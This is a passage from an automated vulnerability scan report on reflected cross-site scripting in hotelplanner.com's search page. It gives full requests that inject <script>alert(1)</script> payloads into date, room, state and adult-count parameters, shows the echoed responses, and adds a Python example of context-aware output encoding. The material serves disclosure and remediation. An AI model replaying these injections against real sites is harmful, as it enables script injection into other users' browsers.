Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:30 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:30 GMT;path=/
Vary: Accept-Encoding
Content-Length: 116967


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/201183c95"><script>alert(1)</script>e05fe8cdb05&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.258. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the InDate request parameter is copied into the HTML document as plain text between tags. The payload 76afe<script>alert(1)</script>50d24de7e84 was submitted in the InDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. Unlike 4.257, where the same InDate value is reflected inside the AddThis onclick attribute, this second sink is the page header cell that prints the check-in and check-out dates as plain text, so no quote or comment break-out is needed and a bare <script> element suffices. The application displayed the value without validating it as a date.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/201176afe<script>alert(1)</script>50d24de7e84&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:31 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:31 GMT;path=/
Vary: Accept-Encoding
Content-Length: 116943


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<td align="center" style="FONT-SIZE: 18px;font-weight:bold;FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif;">Boston&nbsp;&nbsp;&nbsp;&nbsp;10/04/201176afe<script>alert(1)</script>50d24de7e84 - 10/07/2011</td>
...[SNIP]...
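Per-context output encoding is the fix for every sink in this group. The following Python is an added example; it is not HotelPlanner's ColdFusion code and not part of the report. The two templates copy the shape of the report's snippets (the AddThis onclick handler from 4.254 to 4.257 and the dates cell from 4.258), the payload constants are the ones the report submitted, and the round-trip checks use Python's html.parser as a stand-in for the browser's HTML parser. The function names are the example's own.

```python
"""Context-aware output encoding for the sinks seen in this report.

Added example: not HotelPlanner's ColdFusion code and not part of the
XSS.CX report. The templates copy the shape of the report's snippets
(the addthis_open onclick handler and the dates <td>); function names and
the round-trip checks are the example's own. Requires only the stdlib.
"""
import html
import json
import re
from html.parser import HTMLParser

# Payloads exactly as submitted in findings 4.253, 4.254 and 4.258.
COMMENT_PAYLOAD = '167436cb8c--><script>alert(1)</script>ec0a7626931'
ATTR_PAYLOAD = '1674374230"><script>alert(1)</script>48c0c0576c3'
TEXT_PAYLOAD = '10/04/201176afe<script>alert(1)</script>50d24de7e84'


def enc_text(s: str) -> str:
    """Text between tags: & < > suffice."""
    return html.escape(s, quote=False)


def enc_attr(s: str) -> str:
    """Quoted attribute value: additionally encode both quote characters."""
    return html.escape(s, quote=True)


def enc_js_string_in_attr(s: str) -> str:
    """JS string literal inside an event-handler attribute: two layers, innermost
    first. json.dumps yields a double-quoted literal with quotes and backslashes
    escaped; < > & become \\uXXXX so no markup survives; then the whole literal
    is attribute-encoded, because the browser HTML-decodes the attribute before
    the JS parser ever sees it."""
    literal = json.dumps(s)
    literal = literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    return enc_attr(literal)


def enc_comment(s: str) -> str:
    """Data inside <!-- -->: entities are not decoded there, so rewriting every
    '-' and '>' makes '-->' (and '--!>') impossible to form. Better still: keep
    request data out of comments altogether."""
    return s.replace("-", "&#45;").replace(">", "&gt;")


def render_share_link_unsafe(page_url: str) -> str:
    """What the report shows: raw interpolation into the onclick handler."""
    return '<a href="/" onclick="return addthis_open(this, \'\', \'%s\', \'x\')">share</a>' % page_url


def render_share_link(page_url: str) -> str:
    """Hardened version of the same handler."""
    return ('<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, \'\', %s, '
            '\'HotelPlanner.com Group Hotel Rates &amp; Group Travel\')">share</a>'
            % enc_js_string_in_attr(page_url))


def render_dates_cell(city: str, in_date: str, out_date: str) -> str:
    """Hardened version of the search-page header cell."""
    return '<td align="center">%s&nbsp;%s - %s</td>' % (enc_text(city), enc_text(in_date), enc_text(out_date))


class _Collector(HTMLParser):
    """Records what a browser-like parser sees: start tags, attributes, text, comments."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs, self.text, self.comments = [], {}, [], []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.update(attrs)          # attribute values arrive HTML-decoded
    def handle_data(self, data):
        self.text.append(data)
    def handle_comment(self, data):
        self.comments.append(data)


def parse(markup: str) -> _Collector:
    c = _Collector()
    c.feed(markup)
    c.close()
    return c


def share_link_round_trip(page_url: str) -> str:
    """Render, parse, pull the JS literal out of the decoded onclick value and
    JSON-decode it: the URL the handler would actually receive. Raises if a
    <script> element was parsed, i.e. the payload escaped the attribute."""
    doc = parse(render_share_link(page_url))
    if "script" in doc.tags:
        raise AssertionError("payload escaped the attribute")
    literal = re.search(r'"(?:[^"\\]|\\.)*"', doc.attrs["onclick"]).group(0)
    return json.loads(literal)


def dates_cell_round_trip(in_date: str) -> str:
    """Render the dates cell with a hostile InDate; return the text a parser sees."""
    doc = parse(render_dates_cell("Boston", in_date, "10/07/2011"))
    if "script" in doc.tags:
        raise AssertionError("payload escaped the text node")
    return "".join(doc.text)


def comment_round_trip(data: str) -> tuple:
    """Wrap encoded data in a comment; return (tags parsed, comment bodies seen)."""
    doc = parse("<!--" + enc_comment(data) + "-->")
    return doc.tags, doc.comments
```

The onclick case needs two encoders because the browser decodes the attribute as HTML before the JavaScript engine parses the handler; encoding for only one of the two layers leaves the other open, which is why a generic "HTML-encode everything" filter would still have left 4.254 to 4.257 exploitable through a backslash or entity. The comment encoder is a fallback only; the real remediation for 4.253 is to stop writing the request URL into the diagnostic comment in the first place.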

4.259. http://www.hotelplanner.com/Search/Index.cfm [NumRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the NumRooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55f79"><script>alert(1)</script>e8ddfbe6e0 was submitted in the NumRooms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=155f79"><script>alert(1)</script>e8ddfbe6e0&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:36 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:36 GMT;path=/
Vary: Accept-Encoding
Content-Length: 117313


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=155f79"><script>alert(1)</script>e8ddfbe6e0&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.260. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the OutDate request parameter is copied into the HTML document as plain text between tags. The payload 98a59<script>alert(1)</script>9f1d973ec8e was submitted in the OutDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. This is the same plain-text header cell as in 4.258, here reflecting the OutDate value; 4.261 shows the same parameter reflected a second time inside the AddThis onclick attribute.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/201198a59<script>alert(1)</script>9f1d973ec8e&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:36 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:36 GMT;path=/
Vary: Accept-Encoding
Content-Length: 116944


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<td align="center" style="FONT-SIZE: 18px;font-weight:bold;FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif;">Boston&nbsp;&nbsp;&nbsp;&nbsp;10/04/2011 - 10/07/201198a59<script>alert(1)</script>9f1d973ec8e</td>
...[SNIP]...

4.261. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the OutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e15"><script>alert(1)</script>8bc2304a16a was submitted in the OutDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011c9e15"><script>alert(1)</script>8bc2304a16a&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:34 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:34 GMT;path=/
Vary: Accept-Encoding
Content-Length: 116968


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011c9e15"><script>alert(1)</script>8bc2304a16a&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.262. http://www.hotelplanner.com/Search/Index.cfm [State parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the State request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d46d"><script>alert(1)</script>a26c259b4ab was submitted in the State parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts1d46d"><script>alert(1)</script>a26c259b4ab&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:53 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:53 GMT;path=/
Vary: Accept-Encoding
Content-Length: 204589


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
nmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts1d46d"><script>alert(1)</script>a26c259b4ab&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.263. http://www.hotelplanner.com/Search/Index.cfm [adults parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the adults request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0c52"><script>alert(1)</script>4bf2e57ade7 was submitted in the adults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1d0c52"><script>alert(1)</script>4bf2e57ade7&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%2